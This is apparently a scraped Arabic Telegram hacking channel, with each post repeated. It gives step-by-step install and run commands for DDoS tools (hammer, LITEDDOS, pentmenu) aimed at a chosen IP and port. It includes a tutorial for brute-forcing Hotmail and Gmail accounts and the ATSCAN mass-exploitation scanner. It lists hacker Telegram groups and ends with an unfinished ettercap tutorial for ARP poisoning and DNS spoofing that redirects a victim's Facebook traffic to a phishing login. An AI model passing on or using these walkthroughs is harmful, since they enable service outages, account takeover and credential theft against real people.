7- اداه portwitness
تم تصميم PortWitness كأداة للكشف عن النطاقات النشطة والمجالات الفرعية لمواقع الويب التي تستخدم ميزة فحص المنافذ. يساعد اختبار الاختراق وصائدي الأخطاء في جمع وجمع المعلومات حول النطاقات الفرعية النشطة للمجال الذي يستهدفونه. يقوم PortWitness بتعداد النطاقات الفرعية باستخدام Sublist3r ويستخدم Nmap مع nslookup للبحث عن المواقع النشطة. أخيرًا ، يتم تخزين المجال أو النطاقات الفرعية النشطة في ملف إخراج باستخدام ملف الإخراج هذا ، يمكن للمستخدم بدء اختبار هذه المواقع مباشرة. تم دمج Sublist3r أيضًا مع هذه الوحدة. إنه فعال للغاية ودقيق عندما يتعلق الأمر بمعرفة النطاقات الفرعية النشطة باستخدام Nmap و nslookup. تساعد هذه الأداة أيضًا المستخدم في الحصول على عناوين IP لجميع النطاقات الفرعية والمخازن ، ثم في ملف نصي ، يمكن استخدام عناوين IP هذه لإجراء مزيد من المسح للهدف.
اوامر تثبيتها
git clone https://github.com/viperbluff/PortWitness.git
chmod +x portwitness.sh
bash portwitness.sh الرابط
#CS
تم تصميم PortWitness كأداة للكشف عن النطاقات النشطة والمجالات الفرعية لمواقع الويب التي تستخدم ميزة فحص المنافذ. يساعد اختبار الاختراق وصائدي الأخطاء في جمع وجمع المعلومات حول النطاقات الفرعية النشطة للمجال الذي يستهدفونه. يقوم PortWitness بتعداد النطاقات الفرعية باستخدام Sublist3r ويستخدم Nmap مع nslookup للبحث عن المواقع النشطة. أخيرًا ، يتم تخزين المجال أو النطاقات الفرعية النشطة في ملف إخراج باستخدام ملف الإخراج هذا ، يمكن للمستخدم بدء اختبار هذه المواقع مباشرة. تم دمج Sublist3r أيضًا مع هذه الوحدة. إنه فعال للغاية ودقيق عندما يتعلق الأمر بمعرفة النطاقات الفرعية النشطة باستخدام Nmap و nslookup. تساعد هذه الأداة أيضًا المستخدم في الحصول على عناوين IP لجميع النطاقات الفرعية والمخازن ، ثم في ملف نصي ، يمكن استخدام عناوين IP هذه لإجراء مزيد من المسح للهدف.
اوامر تثبيتها
git clone https://github.com/viperbluff/PortWitness.git
chmod +x portwitness.sh
bash portwitness.sh الرابط
#CS
GitHub
GitHub - viperbluff/PortWitness: Tool for checking Whether a domain or its multiple sub-domains are up and running.
Tool for checking Whether a domain or its multiple sub-domains are up and running. - viperbluff/PortWitness
9- اداه ko-dork
يعمل الماسح الضوئي على شبكة الإنترنت
اوامر تثبيتها
$ pkg update upgrade
$ pkg install git python2
$ git clone https://github.com/ciku370/ko-dork
$ cd ko-dork
$ python2 dork.py
#CS
يعمل الماسح الضوئي على شبكة الإنترنت
اوامر تثبيتها
$ pkg update upgrade
$ pkg install git python2
$ git clone https://github.com/ciku370/ko-dork
$ cd ko-dork
$ python2 dork.py
#CS
GitHub
GitHub - jsonluca/ko-dork: A simple vuln web scanner
A simple vuln web scanner. Contribute to jsonluca/ko-dork development by creating an account on GitHub.
10- اداه pentmenuDDoS
عمل هجمات دوس اتاك
اوامر تثبيتها
git clone https://github.com/GinjaChris/pentmenu
chmod +x ./pentmenu
./pentmenu
#CS
عمل هجمات دوس اتاك
اوامر تثبيتها
git clone https://github.com/GinjaChris/pentmenu
chmod +x ./pentmenu
./pentmenu
#CS
GitHub
GitHub - GinjaChris/pentmenu: A bash script for recon and DOS attacks
A bash script for recon and DOS attacks. Contribute to GinjaChris/pentmenu development by creating an account on GitHub.
5- اداه Acunetix
هي من بين أهم الأدوات المستخدمة حاليا وبكثرة عند المهتمين بمجال أمن المعلومات وإختبار إختراق تطبيقات الويب، تعمل الأداة علىفحص تطبيقات الويب وإستخراج ثغرات Sql injection & XSS، كما أن الأداة تعمل على مساعدة مختبر الإختراق بالكشف على قوة كلمة مرور الصفحات المراض إختبار إختراقها وتحديد طبيعة الثغرات الأمنية بالتقارير.
هي من بين أهم الأدوات المستخدمة حاليا وبكثرة عند المهتمين بمجال أمن المعلومات وإختبار إختراق تطبيقات الويب، تعمل الأداة علىفحص تطبيقات الويب وإستخراج ثغرات Sql injection & XSS، كما أن الأداة تعمل على مساعدة مختبر الإختراق بالكشف على قوة كلمة مرور الصفحات المراض إختبار إختراقها وتحديد طبيعة الثغرات الأمنية بالتقارير.
8- اداه skipfish
تعتبر أداة skipfishمن أهم أدوات الإستطلاع المخصصة لإختبار إختراق تطبيقات الويب، تعمل هذه الأداة البسيطة عبر عملية الزحف المتكرر (Recursive Crawl) وتقوم بإستغلال نتائج sitemap للوصول إلىثغرة بتطبيقات الويب وإختبار إختراقها.
تعتبر أداة skipfishمن أهم أدوات الإستطلاع المخصصة لإختبار إختراق تطبيقات الويب، تعمل هذه الأداة البسيطة عبر عملية الزحف المتكرر (Recursive Crawl) وتقوم بإستغلال نتائج sitemap للوصول إلىثغرة بتطبيقات الويب وإختبار إختراقها.
اعادة النشر
مجموعه من القنوات و المجموعات المفيدة لتعلم الهكر في التلجرام
1- @Black_hat_islamic
2- @Gaza_Cybergang
3- @Anonymous_ARAB
4- @termuux
5- @Gaza_Cybergang2
6- @Termux_CS
7- @Spider_Team1
8- @PythonP
9- @html_AR
10- @teamlyon25
11- @JAVA_AR
12- @InformationSecurit1
13- @mr_lunixes
14- @sd_anonymous
15- @HACKING_5
16- @Black_Avengers
17- @AnonymusYemenn
18- @Anonymuskill
-------------
1- @Anonymous_syria
2- @Anonymous_Arabic
3- @Black_Hat_Hacker2
4- @HATCK
5- @termux_kali
6- @Python_AR
7- @Anonymous_Sudan
8- @Gaza_Cybergang3
مجموعه من القنوات و المجموعات المفيدة لتعلم الهكر في التلجرام
1- @Black_hat_islamic
2- @Gaza_Cybergang
3- @Anonymous_ARAB
4- @termuux
5- @Gaza_Cybergang2
6- @Termux_CS
7- @Spider_Team1
8- @PythonP
9- @html_AR
10- @teamlyon25
11- @JAVA_AR
12- @InformationSecurit1
13- @mr_lunixes
14- @sd_anonymous
15- @HACKING_5
16- @Black_Avengers
17- @AnonymusYemenn
18- @Anonymuskill
-------------
1- @Anonymous_syria
2- @Anonymous_Arabic
3- @Black_Hat_Hacker2
4- @HATCK
5- @termux_kali
6- @Python_AR
7- @Anonymous_Sudan
8- @Gaza_Cybergang3
مشاركه من الاخ
#Database_hk
مشاركات الاعضاء:
الله يسلمك يـ👈🏼 💙
الاداة devploit مهمتها جمع معلومات عن المواقع وسهلة جدا
لاختبار الاختراق تشتغل على اجهزة الاندرويد على
تطبيق ترمكس - تجلب جميع الثغرات المفتوحة
سواء بالايبي او بالهوست .........
ـــDATABASEـــ
#Database_hk
مشاركات الاعضاء:
الله يسلمك يـ👈🏼 💙
الاداة devploit مهمتها جمع معلومات عن المواقع وسهلة جدا
لاختبار الاختراق تشتغل على اجهزة الاندرويد على
تطبيق ترمكس - تجلب جميع الثغرات المفتوحة
سواء بالايبي او بالهوست .........
ـــDATABASEـــ
Forwarded from مشاركات الاعضاء
مشاركه من #عمر_القحطاني
عن شرح عن المتاحات و كيفيه استخراجها و الي اخرة
عن شرح عن المتاحات و كيفيه استخراجها و الي اخرة
Forwarded from Deleted Account
DDos Attack :
هجمات الحرمان من الخدمات أو هجوم حجب الخدمة(بالإنجليزية: Denial of Service Attacks) هي هجمات تتم عن طريق إغراق المواقع بارسال سيل من البيانات غير اللازمة بشكل كثيف مما يسبب بطء الخدمات أو زحاماً مرورياً بهذه المواقع ويسبب صعوبة وصول المستخدمين لها نظراً لهذا الاكتظاظ .
* هناك العديد من الادوات للقيام بهذا الهجوم ومن احدى الامثلة لدرسنا اليوم هى ادات ( hammer ) :
* طريقة التثبيت والتشغيل :
(1) Apt update & apt upgrade - apt install git
(2) apt-get install python2
(3) git clone https://github.com/cyweb/hammer.git
(4) cd hammer
(5) python hammer.py -s ip -p 80 _t 135
# انتهى الدرس
# اعداد المتدرب ( hamza )
#جزى الله خيرا صاحب القناة لترقيتنا الى التدريب العملى
هجمات الحرمان من الخدمات أو هجوم حجب الخدمة(بالإنجليزية: Denial of Service Attacks) هي هجمات تتم عن طريق إغراق المواقع بارسال سيل من البيانات غير اللازمة بشكل كثيف مما يسبب بطء الخدمات أو زحاماً مرورياً بهذه المواقع ويسبب صعوبة وصول المستخدمين لها نظراً لهذا الاكتظاظ .
* هناك العديد من الادوات للقيام بهذا الهجوم ومن احدى الامثلة لدرسنا اليوم هى ادات ( hammer ) :
* طريقة التثبيت والتشغيل :
(1) Apt update & apt upgrade - apt install git
(2) apt-get install python2
(3) git clone https://github.com/cyweb/hammer.git
(4) cd hammer
(5) python hammer.py -s ip -p 80 _t 135
# انتهى الدرس
# اعداد المتدرب ( hamza )
#جزى الله خيرا صاحب القناة لترقيتنا الى التدريب العملى
GitHub
GitHub - cyweb/hammer: Hammer DDos Script - Python 3
Hammer DDos Script - Python 3. Contribute to cyweb/hammer development by creating an account on GitHub.
Forwarded from ڪٱيت̲و ڪيدّ
sudo suapt-get install git
git clone https://github.com/LionSec/katoolin.git && cp katoolin/katoolin.py
/usr/bin/katoolin
chmod +x /usr/bin/katoolin
sudo katoolin
#كايتو_كيد
git clone https://github.com/LionSec/katoolin.git && cp katoolin/katoolin.py
/usr/bin/katoolin
chmod +x /usr/bin/katoolin
sudo katoolin
#كايتو_كيد
GitHub
GitHub - LionSec/katoolin: Automatically install all Kali linux tools
Automatically install all Kali linux tools. Contribute to LionSec/katoolin development by creating an account on GitHub.
Forwarded from ڪٱيت̲و ڪيدّ
Forwarded from Deleted Account
بسم الله الرحمن الرحيم
درس اليوم ( هجوم الحرمان من الخدمة DDos attack ) :
هجمات الحرمان من الخدمات أو هجوم حجب الخدمة(بالإنجليزية: Denial of Service Attacks) هي هجمات تتم عن طريق إغراق المواقع بارسال سيل من البيانات غير اللازمة بشكل كثيف مما يسبب بطء الخدمات أو زحاماً مرورياً بهذه المواقع ويسبب صعوبة وصول المستخدمين لها نظراً لهذا الاكتظاظ .
* هناك العديد من الادوات للقيام بهذا الهجوم ومن احدى الامثلة لدرسنا اليوم هى ادات ( LITEDDOS ) :
* طريقة التثبيت والتشغيل :
$ apt update
$ apt upgrade
$ pkg install git
KE-EMPAT
$ pkg install python2
$ git clone https://github.com/4L13199/LITEDDOS
$ cd LITEDDOS
$ python2 liteDDOS.py <ip> <port> 100
# انتهى الدرس
# اعداد المتدرب ( hamza )
#جزى الله خيرا صاحب القناة لترقيتنا الى التدريب العملى
درس اليوم ( هجوم الحرمان من الخدمة DDos attack ) :
هجمات الحرمان من الخدمات أو هجوم حجب الخدمة(بالإنجليزية: Denial of Service Attacks) هي هجمات تتم عن طريق إغراق المواقع بارسال سيل من البيانات غير اللازمة بشكل كثيف مما يسبب بطء الخدمات أو زحاماً مرورياً بهذه المواقع ويسبب صعوبة وصول المستخدمين لها نظراً لهذا الاكتظاظ .
* هناك العديد من الادوات للقيام بهذا الهجوم ومن احدى الامثلة لدرسنا اليوم هى ادات ( LITEDDOS ) :
* طريقة التثبيت والتشغيل :
$ apt update
$ apt upgrade
$ pkg install git
KE-EMPAT
$ pkg install python2
$ git clone https://github.com/4L13199/LITEDDOS
$ cd LITEDDOS
$ python2 liteDDOS.py <ip> <port> 100
# انتهى الدرس
# اعداد المتدرب ( hamza )
#جزى الله خيرا صاحب القناة لترقيتنا الى التدريب العملى
GitHub
GitHub - 4L13199/LITEDDOS: This Tool Is Supporting For DDOS Activities, The Way Is Typing Command : $ python2 islddos.py <ip>…
This Tool Is Supporting For DDOS Activities, The Way Is Typing Command : $ python2 islddos.py <ip> <port> <packet> example: $python2 islddos.py 104.27....
Forwarded from DEYAA ..𓂆
شرح أداة Hotmail BruteForce ..🔥
هاي الاداة رح نستخدمها من خلال اداة multitools اللي فيها ادوات تانية غير اداة
Hotmail BruteForce
وخطوات تنزيلها للتيرمكس طبعا
كالتالي ..👇👇👇
نثبت اداة multitools من موقع github
git clone https://github.com/sp1dermanhackeryoutube/multitools.git
cd multitools
cd Multitools
((ملاحظة)) 👈 لاحظوا الامرين الاخيرين متشابهين فقط حرف M بختلف ..
chmod +x install.sh
chmod +x multitools.py
-----
((فائدة)) 👈 الامرين chmod بنقدر نستبدلهم بأمر واحد بدل م نعمل كل واحد على حدى بهاد الامر اللي بخلي كل الملفات باللون الاخضر وتقدر تشغلها على البايثون ..
chmod +x *
------
الان ندخل التالي
./install.sh
واخر خطوة لنفوت عالاداة وهي باستخدام python3
python3 multitools.py
بتضغط Enter مرتين
الان الاداة تثبتت رح نفوت منها على الأداة رقم 2
[2] Hotmail BruteForce
نختار الخيار الاول للتخمين ..
رح يطلب منك مسار ملف التخمين اللي رح يستخدمو .
تاني شي بيطلب الايميل
ورح يبدأ الهجوم متل م هوا مبين بالصور .
((ملاحظة صغيرة))
اذا ما عندك ملف كلمات سر ممكن تنشئه عن طريق الأداة
من الخيار رقم 3 بعد م تفوت على الأداة من الامر
python3 multitools.py
نختار
[3] Wordlist Generator
منها رح يطلب منك شوية معلومات ع اساسها رح يعمل ملف تخمين تقدر تستخدمو للهجوم على الايميل اللي بدك ياا .
الاداة ممكن تستخدمها لل Gmail أيضاا ..❤
.....
بتمنى يكون الشرح كآفي ووآفي
أخوكم // #Deyaa.R
هاي الاداة رح نستخدمها من خلال اداة multitools اللي فيها ادوات تانية غير اداة
Hotmail BruteForce
وخطوات تنزيلها للتيرمكس طبعا
كالتالي ..👇👇👇
نثبت اداة multitools من موقع github
git clone https://github.com/sp1dermanhackeryoutube/multitools.git
cd multitools
cd Multitools
((ملاحظة)) 👈 لاحظوا الامرين الاخيرين متشابهين فقط حرف M بختلف ..
chmod +x install.sh
chmod +x multitools.py
-----
((فائدة)) 👈 الامرين chmod بنقدر نستبدلهم بأمر واحد بدل م نعمل كل واحد على حدى بهاد الامر اللي بخلي كل الملفات باللون الاخضر وتقدر تشغلها على البايثون ..
chmod +x *
------
الان ندخل التالي
./install.sh
واخر خطوة لنفوت عالاداة وهي باستخدام python3
python3 multitools.py
بتضغط Enter مرتين
الان الاداة تثبتت رح نفوت منها على الأداة رقم 2
[2] Hotmail BruteForce
نختار الخيار الاول للتخمين ..
رح يطلب منك مسار ملف التخمين اللي رح يستخدمو .
تاني شي بيطلب الايميل
ورح يبدأ الهجوم متل م هوا مبين بالصور .
((ملاحظة صغيرة))
اذا ما عندك ملف كلمات سر ممكن تنشئه عن طريق الأداة
من الخيار رقم 3 بعد م تفوت على الأداة من الامر
python3 multitools.py
نختار
[3] Wordlist Generator
منها رح يطلب منك شوية معلومات ع اساسها رح يعمل ملف تخمين تقدر تستخدمو للهجوم على الايميل اللي بدك ياا .
الاداة ممكن تستخدمها لل Gmail أيضاا ..❤
.....
بتمنى يكون الشرح كآفي ووآفي
أخوكم // #Deyaa.R
GitHub
GitHub - AnonymousSp1dy/multitools: This is a multihack with Gmail bruteforce, Hotmail Bruteforce and a password generator.
This is a multihack with Gmail bruteforce, Hotmail Bruteforce and a password generator. - AnonymousSp1dy/multitools
Forwarded from ▂▃▄▅▆▇█▓▒░فّخِأُمِﮭ -┆💙♕░▒▓█▇▆▅▄▃▂
*الـ💔ــّωــ✋ـَّلاρٓ ؏ٓـلْيگــــρ*
شرحنا اليوم عن سكربت ATSCAN لبحث عن دوركات والبحث عن مواقع مصابة بثغرات - ATSCAN tool for scan DORKS
ATSCAN Advanced Search / Dork / Mass Exploitation Scanner
Install..
$ pkg install git perl
$ git clone https://github.com/AlisamTechnology/ATSCAN
$ cpan install URI::Escape
$ cpan install HTML::Entities
$ perl atscan.pl -h
Sory friends I m use this video
$ cpan install HTTP::Entities this is wrong
★ Description
● عمليات مسح فورية متعددة.
● الاستغلال الشامل
● استخدام الوكيل.
● وكيل مستخدم عشوائي.
● محرك عشوائي.
● أوامر التنفيذ الشامل الشامل.
● يستغل وقضايا البحث.
● XSS / SQLI / LFI / AFD الماسح الضوئي.
● تصفية مواقع وورد و جملة.
● وورد موضوع والكشف عن البرنامج المساعد.
● البحث عن صفحة المسؤول.
● فك شفرة / تشفير Base64 / MD5
● مسح المنافذ.
● اجمع عناوين IP
● اجمع رسائل البريد الإلكتروني.
● الكشف التلقائي عن الأخطاء.
● الكشف التلقائي عن النماذج.
● الكشف التلقائي سم.
● نشر البيانات.
● مكرر تسلسل تلقائي.
● التحقق من الصحة.
● نشر والحصول على طريقة
● توطين IP
● قضايا واستغلال البحث
● واجهة تفاعلية وعادية.
● والمزيد ...
***********************
Pls like subscribes my channel
***********************
THIS VIDEO IS ONLY FOR EDUCATIONAL PURPOSE DON`T Missus s THIS TUTORIAL....
***********************
Thanks for watching
yours.
Arif-Tech
ariftech
شرحنا اليوم عن سكربت ATSCAN لبحث عن دوركات والبحث عن مواقع مصابة بثغرات - ATSCAN tool for scan DORKS
ATSCAN Advanced Search / Dork / Mass Exploitation Scanner
Install..
$ pkg install git perl
$ git clone https://github.com/AlisamTechnology/ATSCAN
$ cpan install URI::Escape
$ cpan install HTML::Entities
$ perl atscan.pl -h
Sory friends I m use this video
$ cpan install HTTP::Entities this is wrong
★ Description
● عمليات مسح فورية متعددة.
● الاستغلال الشامل
● استخدام الوكيل.
● وكيل مستخدم عشوائي.
● محرك عشوائي.
● أوامر التنفيذ الشامل الشامل.
● يستغل وقضايا البحث.
● XSS / SQLI / LFI / AFD الماسح الضوئي.
● تصفية مواقع وورد و جملة.
● وورد موضوع والكشف عن البرنامج المساعد.
● البحث عن صفحة المسؤول.
● فك شفرة / تشفير Base64 / MD5
● مسح المنافذ.
● اجمع عناوين IP
● اجمع رسائل البريد الإلكتروني.
● الكشف التلقائي عن الأخطاء.
● الكشف التلقائي عن النماذج.
● الكشف التلقائي سم.
● نشر البيانات.
● مكرر تسلسل تلقائي.
● التحقق من الصحة.
● نشر والحصول على طريقة
● توطين IP
● قضايا واستغلال البحث
● واجهة تفاعلية وعادية.
● والمزيد ...
***********************
Pls like subscribes my channel
***********************
THIS VIDEO IS ONLY FOR EDUCATIONAL PURPOSE DON`T Missus s THIS TUTORIAL....
***********************
Thanks for watching
yours.
Arif-Tech
ariftech
GitHub
GitHub - AlisamTechnology/ATSCAN: Advanced dork Search & Mass Exploit Scanner
Advanced dork Search & Mass Exploit Scanner. Contribute to AlisamTechnology/ATSCAN development by creating an account on GitHub.
Forwarded from Danial Silva
اليوم سوف أقوم بشرح عن أداة تحليل البروتوكولات وكيف يتم تحليلها واستغلالها
بدايةً سوف نتكلم عن البروتوكول وهو...
هو بروتوكول الاتصال الأساسي في حزمة بروتوكولات الإنترنت ويُشكّل الأساس الذي تعتمد عليه عمليّة توجيه الرزم (Routing) ضمن الشبكة، ويسمح ذلك بالاتصال بين الشبكات المُختلفة، وهذا هو جوهر شبكة الإنترنت.
اي أنهُ بإختصار مثل الوسيط بينك وبين الشبكة حتى تستطيع الحصول على ما تُريد وهُناك العديد من البروتوكولات ولكل بروتوكول مهمة خاصّة به....
لنبدأ الشرح...
#Tools :
+ Wireshark
+ Bettercap
#Steps :
1- سوف نقوم بتشغيل أداة تحليل البروتوكولات وهكذا سوف يكون تم إجتياز أول شئ من الشرح....
# لتشغيل الأداة يوجد طريقتين....
- كتابة wireshark داخل التيرمنال
- نذهب إلى
Application => => wireshark
# سوف تظهر لنا واجهة بها إختيار interface الخاص بنا يمكنك إختيار eth0 أو wlan0 حسب الذي تعمل به
# سوف تظهر لنا نافذة الأداة ومن هُنا نبدأ في تحليل البروتوكولات.....
لنتابع معاً....
2- بعد أن تظهر لنا نافذة الأداة سيظهر لنا العديد من الأشياء ولكن بالطبع لن نفهم شئ لذا لنفهم مع بعض كِل شئ...
سوف أترك صورة توّضح ما أتكلم عنه في الأسفل وسوف تجدوا أرقام وهي التي توّضح ما أتكلم عنه هُنا....
#1- ستجد كلمة مخفية مثل هذه....
Apply a display filter __ <Ctrl-/>
وهي تعني فلترة الأشياء التي تظهر لك وهي مثل موجه الأوامر الخاص بالأداة وسنفهم هذا لاحقاً....
#2- شريط المهام وبه كُلاً من....
No. Time
وهي تعني برقم العملية وبجانبه الوقت وتظهر لك بالشكل التالي...
1 0.000000000
2 0.157298626
Source
وهي تعني بالمصدر الذي يأتي منهُ المعلومات والمقصود بها الأي بي الداخلي ويكون مثل هذا....
192.168.1.4
Destination
ستجد العديد من الأيبيات ولكن ستجد أيضاً الأي بي الذي قام بالإتصال عبرهُ...
Protocol
وهذه تعني البروتوكول المُستخدم وستجد العديد من البروتوكولات مثل....
DNS
UDP
TCP
info
وهذه تعني إتصل بماذا؟....
فمثلاً إذا كان البروتوكول الذي قُمنا باستغلاله هو DNS ستجد بعض الأشياء وبالنهاية إسم الموقع أو DNS الخاص بالشئ الذي إتصل به....
حسناً لنرى ما يُمكننا فعله....
سنقوم بفلترة الأشياء عبر الذي شرحته أول شئ الذي يُسمى filter...
سنقوم بوضع الشئ الذي نقوم بتحليل مثل البروتوكول وسوف نستخدم بروتوكول DNS ونقوم بتحليله لنرى كيف ذلك....
نكتب بالفراغ هذا فقط ثلاثة أحرف وهما...
# dns
وعندما يتصل أي أحد داخل الشبكة بأي شئ عبر هذا البروتوكول ستجد الأي بي الخاص به بالأهداف التي قام بزيارتها وكُل شئ وهكذا قد إنتهينا من تحليل البروتوكولات ويمكنك إضافة أي بروتوكول تُريده بدل dns ويمكنك إضافة أي بي مُعين أيضاً عبر كتابة الأمر التالي...
# ip.addr == الأي بي الذي تُريده
وإذا أردت تحليل بروتوكول مُعين نكتب التالي....
# ip.addr == الأي بي الذي تُريده && dns
أو يُمكنك إختيار البروتوكول الذي تُريده...
3- نأتي لكيفية الإستغلال وهُنا سوف نستخدم أداة ettercap....
# لتشغيل الأداة يوجد طريقتين أيضاً
ولكن سوف نستخدم الطريقة الأتية...
# Application => Sniff & Spoof => ettercap-gui
ولكن قبل هذا يجب علينا تعديل بعض الأشياء حتى تعمل معنا الأداة جيداً....
نكتب الأمر التالي داخل التيرمنال...
# gedit /etc/ettercap/etter.conf
ستجد كلمتي
ec_uid ==> x
ec_gid ==> x
وهذا الحرف يعني رقم عليك بتغييرها إلى رقم 0 هكذا....
ec_uid ==> 0
ec_gid ==> 0
وقُم بالبحث قليلاً عن كلمة root ستجد الأتي....
#---------------
# Linux
#---------------
# ,,,,,,,, iptables
وستجد الكلمات التالية
#redir_command_on
#redir_command_off
قُم بحذف علامة الهاش هكذا....
redir_command_on
redir_command_off
نقوم بالتعديل على ملف dns حتى نقوم بعمل إعادة توجيه للرابط الذي نُريده...
سوف أُكمل وكأننا سوف نقوم بإستغلال dns
لإعادة التوجيه لرابط خبيث به تسجيل دخول إلى فيسبوك ولكي نفعل هذا سنقوم بعمل إضافة dns
الخاص بموقع فيسبوك داخل الملف وبجانبه سنضع أي بي الرابط الخاص بنا...
نكتب التالي بالتيرمنال...
# gedit /etc/ettercap/etter.dns
سنجد كلمة microsoft sucks
وبعدها روابط مثل...
microsoft.com
*.microsoft.com
www.microsoft.com
نقوم بتغيير microsoft
إلى الرابط الذي نُريد عمل تجسس عليه
وبجانبه سنجد أي بي سنقوم بتغييرها إلى أي بي أو هوست الرابط....
الأن سنبدأ الإستغلال...
# بعد تشغيل الأداة نختار
# Sniff
نختار
Unfied sniffing
# Hosts
نختار
scan for hosts
# Hosts
نختار منها Hosts list
ليظهر لنا الأهداف
وبعد أن نختار الهدف نقوم بتحديده
Add to Target 2
ونقوم بتحديد أي بي الراوتر
Add to Target 1
# Target
نختار
Current Targets
# Mitm
نختار
Arp Poisoning
ونختار
بدايةً سوف نتكلم عن البروتوكول وهو...
هو بروتوكول الاتصال الأساسي في حزمة بروتوكولات الإنترنت ويُشكّل الأساس الذي تعتمد عليه عمليّة توجيه الرزم (Routing) ضمن الشبكة، ويسمح ذلك بالاتصال بين الشبكات المُختلفة، وهذا هو جوهر شبكة الإنترنت.
اي أنهُ بإختصار مثل الوسيط بينك وبين الشبكة حتى تستطيع الحصول على ما تُريد وهُناك العديد من البروتوكولات ولكل بروتوكول مهمة خاصّة به....
لنبدأ الشرح...
#Tools :
+ Wireshark
+ Bettercap
#Steps :
1- سوف نقوم بتشغيل أداة تحليل البروتوكولات وهكذا سوف يكون تم إجتياز أول شئ من الشرح....
# لتشغيل الأداة يوجد طريقتين....
- كتابة wireshark داخل التيرمنال
- نذهب إلى
Application => => wireshark
# سوف تظهر لنا واجهة بها إختيار interface الخاص بنا يمكنك إختيار eth0 أو wlan0 حسب الذي تعمل به
# سوف تظهر لنا نافذة الأداة ومن هُنا نبدأ في تحليل البروتوكولات.....
لنتابع معاً....
2- بعد أن تظهر لنا نافذة الأداة سيظهر لنا العديد من الأشياء ولكن بالطبع لن نفهم شئ لذا لنفهم مع بعض كِل شئ...
سوف أترك صورة توّضح ما أتكلم عنه في الأسفل وسوف تجدوا أرقام وهي التي توّضح ما أتكلم عنه هُنا....
#1- ستجد كلمة مخفية مثل هذه....
Apply a display filter __ <Ctrl-/>
وهي تعني فلترة الأشياء التي تظهر لك وهي مثل موجه الأوامر الخاص بالأداة وسنفهم هذا لاحقاً....
#2- شريط المهام وبه كُلاً من....
No. Time
وهي تعني برقم العملية وبجانبه الوقت وتظهر لك بالشكل التالي...
1 0.000000000
2 0.157298626
Source
وهي تعني بالمصدر الذي يأتي منهُ المعلومات والمقصود بها الأي بي الداخلي ويكون مثل هذا....
192.168.1.4
Destination
ستجد العديد من الأيبيات ولكن ستجد أيضاً الأي بي الذي قام بالإتصال عبرهُ...
Protocol
وهذه تعني البروتوكول المُستخدم وستجد العديد من البروتوكولات مثل....
DNS
UDP
TCP
info
وهذه تعني إتصل بماذا؟....
فمثلاً إذا كان البروتوكول الذي قُمنا باستغلاله هو DNS ستجد بعض الأشياء وبالنهاية إسم الموقع أو DNS الخاص بالشئ الذي إتصل به....
حسناً لنرى ما يُمكننا فعله....
سنقوم بفلترة الأشياء عبر الذي شرحته أول شئ الذي يُسمى filter...
سنقوم بوضع الشئ الذي نقوم بتحليل مثل البروتوكول وسوف نستخدم بروتوكول DNS ونقوم بتحليله لنرى كيف ذلك....
نكتب بالفراغ هذا فقط ثلاثة أحرف وهما...
# dns
وعندما يتصل أي أحد داخل الشبكة بأي شئ عبر هذا البروتوكول ستجد الأي بي الخاص به بالأهداف التي قام بزيارتها وكُل شئ وهكذا قد إنتهينا من تحليل البروتوكولات ويمكنك إضافة أي بروتوكول تُريده بدل dns ويمكنك إضافة أي بي مُعين أيضاً عبر كتابة الأمر التالي...
# ip.addr == الأي بي الذي تُريده
وإذا أردت تحليل بروتوكول مُعين نكتب التالي....
# ip.addr == الأي بي الذي تُريده && dns
أو يُمكنك إختيار البروتوكول الذي تُريده...
3- نأتي لكيفية الإستغلال وهُنا سوف نستخدم أداة ettercap....
# لتشغيل الأداة يوجد طريقتين أيضاً
ولكن سوف نستخدم الطريقة الأتية...
# Application => Sniff & Spoof => ettercap-gui
ولكن قبل هذا يجب علينا تعديل بعض الأشياء حتى تعمل معنا الأداة جيداً....
نكتب الأمر التالي داخل التيرمنال...
# gedit /etc/ettercap/etter.conf
ستجد كلمتي
ec_uid ==> x
ec_gid ==> x
وهذا الحرف يعني رقم عليك بتغييرها إلى رقم 0 هكذا....
ec_uid ==> 0
ec_gid ==> 0
وقُم بالبحث قليلاً عن كلمة root ستجد الأتي....
#---------------
# Linux
#---------------
# ,,,,,,,, iptables
وستجد الكلمات التالية
#redir_command_on
#redir_command_off
قُم بحذف علامة الهاش هكذا....
redir_command_on
redir_command_off
نقوم بالتعديل على ملف dns حتى نقوم بعمل إعادة توجيه للرابط الذي نُريده...
سوف أُكمل وكأننا سوف نقوم بإستغلال dns
لإعادة التوجيه لرابط خبيث به تسجيل دخول إلى فيسبوك ولكي نفعل هذا سنقوم بعمل إضافة dns
الخاص بموقع فيسبوك داخل الملف وبجانبه سنضع أي بي الرابط الخاص بنا...
نكتب التالي بالتيرمنال...
# gedit /etc/ettercap/etter.dns
سنجد كلمة microsoft sucks
وبعدها روابط مثل...
microsoft.com
*.microsoft.com
www.microsoft.com
نقوم بتغيير microsoft
إلى الرابط الذي نُريد عمل تجسس عليه
وبجانبه سنجد أي بي سنقوم بتغييرها إلى أي بي أو هوست الرابط....
الأن سنبدأ الإستغلال...
# بعد تشغيل الأداة نختار
# Sniff
نختار
Unfied sniffing
# Hosts
نختار
scan for hosts
# Hosts
نختار منها Hosts list
ليظهر لنا الأهداف
وبعد أن نختار الهدف نقوم بتحديده
Add to Target 2
ونقوم بتحديد أي بي الراوتر
Add to Target 1
# Target
نختار
Current Targets
# Mitm
نختار
Arp Poisoning
ونختار